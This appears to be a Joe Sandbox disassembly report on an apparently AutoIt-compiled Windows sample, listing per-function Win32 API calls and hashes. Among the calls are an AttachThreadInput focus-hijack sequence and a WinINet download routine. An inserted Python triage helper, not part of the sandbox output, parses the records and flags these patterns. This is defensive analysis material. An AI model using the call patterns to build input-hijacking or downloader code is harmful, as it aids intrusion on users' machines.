                                                                      • Opcode Fuzzy Hash: cdc1018a31bfc63f8f81101f04e0116248d81d97ab725b9d203da1895610aee3
                                                                      • Instruction Fuzzy Hash: 7421C274E00214BBCF04AFA0DC85EEEBBB8EF09354F040215FA61672D1DB745905DB64
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C82043
                                                                      • GetDlgCtrlID.USER32 ref: 00C8204E
                                                                      • GetParent.USER32 ref: 00C8206A
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C8206D
                                                                      • GetDlgCtrlID.USER32(?), ref: 00C82076
                                                                      • GetParent.USER32(?), ref: 00C8208A
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C8208D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 711023334-1403004172
                                                                      • Opcode ID: 3375aaf28761420b6166f2946072f8ae4b46f285c3899ef99fdeb9cba47b50ea
                                                                      • Instruction ID: f414ccf583ffd6c59411584aaab69047b538de2754cb36ecceb01dcf867b6b18
                                                                      • Opcode Fuzzy Hash: 3375aaf28761420b6166f2946072f8ae4b46f285c3899ef99fdeb9cba47b50ea
                                                                      • Instruction Fuzzy Hash: 2421A1B5E00218BBCF10BFA0DC89FEEBBB8EF09344F004116B951A71A1DB755915EB64
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C8B151
                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B165
                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00C8B16C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B17B
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C8B18D
                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B1A6
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B1B8
                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B1FD
                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B212
                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B21D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: a2cb8d413fe8b82804418f325515e8bb1096c12c4975cc5f0e0a434b618c3cac
                                                                      • Instruction ID: 17d763ca71d212e6e262ca8e47475cddcf4d0f9ba9459d19b3b3f7220df34e72
                                                                      • Opcode Fuzzy Hash: a2cb8d413fe8b82804418f325515e8bb1096c12c4975cc5f0e0a434b618c3cac
                                                                      • Instruction Fuzzy Hash: 703180B5500204BFDB10AF64DC88FBD7BA9BB51319F104116FA15D7190DBB8AE40CF69
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00C52C94
                                                                        • Part of subcall function 00C529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000), ref: 00C529DE
                                                                        • Part of subcall function 00C529C8: GetLastError.KERNEL32(00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000,00000000), ref: 00C529F0
                                                                      • _free.LIBCMT ref: 00C52CA0
                                                                      • _free.LIBCMT ref: 00C52CAB
                                                                      • _free.LIBCMT ref: 00C52CB6
                                                                      • _free.LIBCMT ref: 00C52CC1
                                                                      • _free.LIBCMT ref: 00C52CCC
                                                                      • _free.LIBCMT ref: 00C52CD7
                                                                      • _free.LIBCMT ref: 00C52CE2
                                                                      • _free.LIBCMT ref: 00C52CED
                                                                      • _free.LIBCMT ref: 00C52CFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 9f5925d2634d728156da5c27dd0d8cd3628cde83164d2659813fdc1dd0e0e53b
                                                                      • Instruction ID: 475d4439ecaff2a83591c0f78b651abd765da17238fe8a82fb61854a4e436bb1
                                                                      • Opcode Fuzzy Hash: 9f5925d2634d728156da5c27dd0d8cd3628cde83164d2659813fdc1dd0e0e53b
                                                                      • Instruction Fuzzy Hash: D311A47A100108AFCB02EF54D882CDD3BA5FF16351F5144A5FE48AF322DA31EE94AB94
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C21459
                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00C214F8
                                                                      • UnregisterHotKey.USER32(?), ref: 00C216DD
                                                                      • DestroyWindow.USER32(?), ref: 00C624B9
                                                                      • FreeLibrary.KERNEL32(?), ref: 00C6251E
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C6254B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      • Opcode ID: 5909a5cb66f70a9b5a89a7815878ccc81f279b0848f28621654081629bc2c173
                                                                      • Instruction ID: 4363b7cede5dd9cd9d9a29cd5bfeafc8b4e188ea4d3e84cbc6c498787c348003
                                                                      • Opcode Fuzzy Hash: 5909a5cb66f70a9b5a89a7815878ccc81f279b0848f28621654081629bc2c173
                                                                      • Instruction Fuzzy Hash: 1AD15A31701622CFDB29EF15D8D9A29F7A0BF15700F1842ADE84A6B661DB30ED12DF91
                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C97FAD
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C97FC1
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C97FEB
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C98005
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C98017
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C98060
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C980B0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                      • String ID: *.*
                                                                      • API String ID: 769691225-438819550
                                                                      • Opcode ID: 662edc0b338ea496eae1bdd0bd83719b071d8443d0e63a35f20c326389da831c
                                                                      • Instruction ID: 3ecb994b092f22caaa36d416c6b3050faef87061c7df8efdbe6fc527eb3e8baf
                                                                      • Opcode Fuzzy Hash: 662edc0b338ea496eae1bdd0bd83719b071d8443d0e63a35f20c326389da831c
                                                                      • Instruction Fuzzy Hash: 1B81B1715182419FCF20EF55C888AAEB3E8BF89310F144D6EF895D7250EB34DE498B52
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C935E4
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • LoadStringW.USER32(00CF2390,?,00000FFF,?), ref: 00C9360A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-2391861430
                                                                      • Opcode ID: 18962b93f62b5775ba7a25703dd626ac58e1678a698d9cbd6c2e4821a733234c
                                                                      • Instruction ID: 1073e612bd997d89c26381f627256ef5283069313e4ed13fe2899b9d3cabd3ac
                                                                      • Opcode Fuzzy Hash: 18962b93f62b5775ba7a25703dd626ac58e1678a698d9cbd6c2e4821a733234c
                                                                      • Instruction Fuzzy Hash: AE517B7290025AABCF14EBE0DC86EEEBB78EF14344F084125F505724A1EB305B99EB61
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                        • Part of subcall function 00C3912D: GetCursorPos.USER32(?), ref: 00C39141
                                                                        • Part of subcall function 00C3912D: ScreenToClient.USER32(00000000,?), ref: 00C3915E
                                                                        • Part of subcall function 00C3912D: GetAsyncKeyState.USER32(00000001), ref: 00C39183
                                                                        • Part of subcall function 00C3912D: GetAsyncKeyState.USER32(00000002), ref: 00C3919D
                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00CB8B6B
                                                                      • ImageList_EndDrag.COMCTL32 ref: 00CB8B71
                                                                      • ReleaseCapture.USER32 ref: 00CB8B77
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00CB8C12
                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CB8C25
                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00CB8CFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 1924731296-2107944366
                                                                      • Opcode ID: 2729a0b6048a45655c91ad2880118869f2253439e56de544326664b138c7f2f5
                                                                      • Instruction ID: accb2aa7598fc39d9044e838417d5aba29f04e76468f561ca409ccc3eac69604
                                                                      • Opcode Fuzzy Hash: 2729a0b6048a45655c91ad2880118869f2253439e56de544326664b138c7f2f5
                                                                      • Instruction Fuzzy Hash: F4516C71104214AFD704EF14DC95FAE77E4FB88714F04062DF956972E1CB71AA48DBA2
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C9C272
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C9C29A
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C9C2CA
                                                                      • GetLastError.KERNEL32 ref: 00C9C322
                                                                      • SetEvent.KERNEL32(?), ref: 00C9C336
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C9C341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 126f9ace626a41a8e899b250aca631845a88db60397ea8ff2f4fd22ebc0df087
                                                                      • Instruction ID: 3aaefd0fcdae68b1ac0dfc4014ea53ed24d70bd59fcc983aa111d73cebb9ce6c
                                                                      • Opcode Fuzzy Hash: 126f9ace626a41a8e899b250aca631845a88db60397ea8ff2f4fd22ebc0df087
                                                                      • Instruction Fuzzy Hash: 75314BB1600608AFDB219FA58CC8BAB7AFCFB49744F14851EF456E2211DB34DE049B61
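The AttachThreadInput chain and the WinINet fetch in the two records above are the kind of call sequences an analyst wants pulled out of a long function listing automatically, together with the meaning of the raw hex arguments the report prints. The Python below is an added example, not Joe Sandbox code and not code from the sample: it parses the report's "APIs" lines into records, decodes a few documented Win32 constants by argument position (0x186 is LB_SETCURSEL, 0x111 is WM_COMMAND, 0xB1 is EM_SETSEL, and 0x5 as the second argument of HttpQueryInfoW is HTTP_QUERY_CONTENT_LENGTH), and flags ordered call subsequences. The signature names, the choice to decode only by position, and the sample input (three records copied from the listing above) are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox 'APIs' function records.

Added example for this report: neither Joe Sandbox code nor code from the
analysed sample. Parses per-function call lines into records, decodes a few
documented Win32 constants the report prints as raw hex, and flags ordered
call sequences. The signatures and the constant table are assumptions.
"""
import re
from dataclasses import dataclass, field

# One call line; SAMPLE below shows the three shapes the report uses.
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Documented Win32 values keyed by (API, argument index). Only the argument at
# the prototype position is decoded: the '?' placeholders show the recorded
# list is not always aligned, so matching by value alone would mislead.
_CONST = {
    ("SendMessageW", 1): {0x0186: "LB_SETCURSEL", 0x0111: "WM_COMMAND", 0x00B1: "EM_SETSEL"},
    ("HttpQueryInfoW", 1): {0x5: "HTTP_QUERY_CONTENT_LENGTH"},
}

# Ordered (not necessarily adjacent) direct-call sequences to flag.
_SIGNATURES = {
    "foreground focus hijack via AttachThreadInput":
        ("GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"),
    "WinINet HTTP download":
        ("InternetOpenUrlW", "HttpSendRequestW", "HttpQueryInfoW"),
}

@dataclass
class Call:
    api: str
    module: str
    args: list        # int for 8-digit hex, None for '?', str otherwise
    ref: int
    subcall: bool = False

    def decoded_args(self) -> list:
        out = []
        for i, a in enumerate(self.args):
            name = _CONST.get((self.api, i), {}).get(a) if isinstance(a, int) else None
            out.append(a if name is None else name)
        return out

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)

    def direct_apis(self) -> list:
        return [c.api for c in self.calls if not c.subcall]

    def matches(self) -> list:
        """Signatures whose APIs all occur, in order, among the direct calls."""
        hits = []
        for label, seq in _SIGNATURES.items():
            it = iter(self.direct_apis())
            if all(api in it for api in seq):   # ordered-subsequence test
                hits.append(label)
        return hits

def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else tok

def parse_records(text: str) -> list:
    """Split report text into records; each 'APIs' heading starts a new one."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        m = _CALL_RE.match(line)
        if m and current is not None:
            args = [_parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
            current.calls.append(Call(m["api"], m["mod"], args,
                                      int(m["ref"], 16), m["sub"] is not None))
    return records

# Constructed sample: three records copied verbatim from the report above.
SAMPLE = """\
APIs
• Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C82043
APIs
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B165
• GetWindowThreadProcessId.USER32(00000000), ref: 00C8B16C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B17B
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C9C272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C9C29A
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C9C2CA
"""
```

Calling `parse_records(SAMPLE)` yields three records: the second is flagged as the AttachThreadInput focus-hijack pattern (attaching to the foreground window's input thread is the usual way to get past SetForegroundWindow's restrictions, which GUI-automation runtimes such as AutoIt rely on), the third as a WinINet download, and `decoded_args()` on the first record's SendMessageW call reports LB_SETCURSEL for the 0x186 argument. "Part of subcall function" lines are kept on the record but excluded from sequence matching, because they belong to callee functions and would otherwise produce matches across function boundaries.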
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C63AAF,?,?,Bad directive syntax error,00CBCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C898BC
                                                                      • LoadStringW.USER32(00000000,?,00C63AAF,?), ref: 00C898C3
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C89987
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 858772685-4153970271
                                                                      • Opcode ID: 32f5ea26976849dc56cd71c3d93796fd71664691a8b874df83bb2bf4303c41a1
                                                                      • Instruction ID: 6d76e7114af3bc9ea09e794ddf34a2dc454046cb4dcf7789129c07ad83b100df
                                                                      • Opcode Fuzzy Hash: 32f5ea26976849dc56cd71c3d93796fd71664691a8b874df83bb2bf4303c41a1
                                                                      • Instruction Fuzzy Hash: D6218031D5025EABCF11EF90DC46EEE7739FF28304F084469F519620A2EB719618EB11
                                                                      APIs
                                                                      • GetParent.USER32 ref: 00C820AB
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00C820C0
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C8214D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 1290815626-3381328864
                                                                      • Opcode ID: 0c1808f8af3cdab1def5f7389e1b5f4c9342918b70b0b5eb11f349dbe5a6bea3
                                                                      • Instruction ID: dc067fa5594b420f903aeaccf0c3dfdddc4a83aa3f3903e1036fe3ee6ea1508e
                                                                      • Opcode Fuzzy Hash: 0c1808f8af3cdab1def5f7389e1b5f4c9342918b70b0b5eb11f349dbe5a6bea3
                                                                      • Instruction Fuzzy Hash: 8C110676688706BAF6157221DC0EEAF379CEB0432CF301126FB05A50D1FEA16D016718
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7334fd3f7713cc131145a63c6fead313a6354a2ebceb73be651155604d4959ba
                                                                      • Instruction ID: b9ec7c85bbae5aba758a9002e1b8993248a181f93a31e7a7833589753f77459c
                                                                      • Opcode Fuzzy Hash: 7334fd3f7713cc131145a63c6fead313a6354a2ebceb73be651155604d4959ba
                                                                      • Instruction Fuzzy Hash: 4DC1E278904249EFCF21DFA8C841BADBBB0FF4D311F144199E825A7292C7748A89CB65
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                      • String ID:
                                                                      • API String ID: 1282221369-0
                                                                      • Opcode ID: 25514bd597fdc84317225b3df39ff6ce46edfdd5a0dbe34fe06d2e128bdc7c22
                                                                      • Instruction ID: 666fd567b1bf1079b4264ef13d4931217a7b4cfb50573cba79b68fc1b289d38d
                                                                      • Opcode Fuzzy Hash: 25514bd597fdc84317225b3df39ff6ce46edfdd5a0dbe34fe06d2e128bdc7c22
                                                                      • Instruction Fuzzy Hash: EB614579904300AFDB21AFF4D8C1B6E7BE5AF01722F14026DFC11A7282D6319AC9D799
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00CB5186
                                                                      • ShowWindow.USER32(?,00000000), ref: 00CB51C7
                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00CB51CD
                                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00CB51D1
                                                                        • Part of subcall function 00CB6FBA: DeleteObject.GDI32(00000000), ref: 00CB6FE6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB520D
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CB521A
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CB524D
                                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00CB5287
                                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00CB5296
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0
                                                                      • Opcode ID: 7e51287f106a520c57f53a6449854ae331c2918cb7da501b65925c2d9e431662
                                                                      • Instruction ID: 3dfb4f195d79f793b2ebee0268d8f8bf5834106c8340b4b8f765b85cedf736ee
                                                                      • Opcode Fuzzy Hash: 7e51287f106a520c57f53a6449854ae331c2918cb7da501b65925c2d9e431662
                                                                      • Instruction Fuzzy Hash: 1651A330A52A08FFEF249F69DC4ABDD3B65FB05321F144112F525962E0C7B5AE80DB41
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C76890
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C768A9
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C768B9
                                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C768D1
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C768F2
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C38874,00000000,00000000,00000000,000000FF,00000000), ref: 00C76901
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C7691E
                                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C38874,00000000,00000000,00000000,000000FF,00000000), ref: 00C7692D
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID:
                                                                      • API String ID: 1268354404-0
                                                                      • Opcode ID: a50def95b58a68e41ffe438ac3a5736c23e6b89579a29ba555e8b72d164634f2
